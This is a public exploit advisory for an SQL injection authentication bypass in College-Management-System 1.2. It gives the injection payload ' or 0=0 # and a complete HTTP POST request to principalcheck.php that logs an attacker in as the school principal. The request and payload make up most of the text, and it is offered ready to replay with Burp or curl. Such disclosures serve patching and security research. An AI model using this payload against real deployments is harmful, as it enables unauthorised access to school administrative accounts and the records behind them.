College-Management-System version 1.2 suffers from an authentication bypass vulnerability.
2da50c22c30f8eb5f66ffd049acce3093bd33805039da5f3b3711a925f8e565c
# Exploit Title: College-Management-System 1.2 - Authentication Bypass
# Author: Cakes
# Discovery Date: 2019-09-14
# Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System
# Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip
# Tested Version: 1.2
# Tested on OS: CentOS 7
# CVE: N/A
# Discription:
# Easy authentication bypass vulnerability on the application
# allowing the attacker to log in as the school principal.
# Simply replay the below Burp request or use Curl.
# Payload: ' or 0=0 #
POST /college/principalcheck.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/college/principalcheck.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
emailid='%20or%200%3d0%20#&pass=asdf